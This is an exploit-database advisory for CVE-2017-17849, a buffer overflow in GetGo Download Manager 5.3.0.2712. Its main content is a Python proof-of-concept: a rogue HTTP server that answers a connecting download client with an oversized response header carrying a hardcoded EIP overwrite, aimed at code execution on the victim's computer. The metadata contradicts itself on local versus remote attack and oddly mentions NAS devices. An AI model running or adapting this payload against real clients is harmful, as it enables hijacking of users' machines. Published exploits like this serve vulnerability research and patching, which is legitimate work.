GetGo Download Manager 5.3.0.2712 Buffer Overflow

2017.12.25
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 # CVE: CVE-2017-17849 # Date: 22-12-2017 # Tested on Windows 10 32 bits # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr> # Software Link: http://www.getgosoft.com/getgodm/ <http://www.getgosoft.com/getgodm/> # Category: webapps # Attack Type: Remote # Impact: Code Execution 1. Description A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer. 2. Proof of Concept def main(): host = "192.168.205.128" port = 80 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] evilbuffer = "A" * 4105 hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo :). As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this. pads = "C"*(6000 - len(evilbuffer + hardCodedEIP)) payload = evilbuffer + hardCodedEIP + pads buffer = "HTTP/1.1 200 " + payload + "\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(3) cl.close() s.close() if __name__ == '__main__': import socket from time import sleep main() 3. Solution: No solution as of yet.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top